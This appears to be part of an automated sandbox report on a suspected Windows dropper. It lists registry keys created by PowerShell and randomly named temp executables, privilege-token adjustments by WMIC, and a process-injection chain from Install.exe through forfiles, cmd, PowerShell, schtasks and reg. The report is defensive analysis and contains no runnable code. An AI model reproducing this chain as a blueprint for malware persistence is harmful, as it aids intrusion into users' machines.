Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
